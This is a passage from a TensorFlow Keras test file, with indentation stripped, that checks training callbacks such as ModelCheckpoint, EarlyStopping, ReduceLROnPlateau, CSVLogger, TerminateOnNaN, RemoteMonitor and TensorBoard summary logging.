model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
training_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*80/80.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=30,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _run_load_weights_on_restart_test_common_iterations(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
initial_epochs = 3
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are different, if a ModelCheckpoint with
# load_weights_on_restart=False is given (so the model is not restored at
# the beginning of training).
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period to ensure the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly(),
experimental_run_tf_function=testing_utils.should_run_tf_function())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
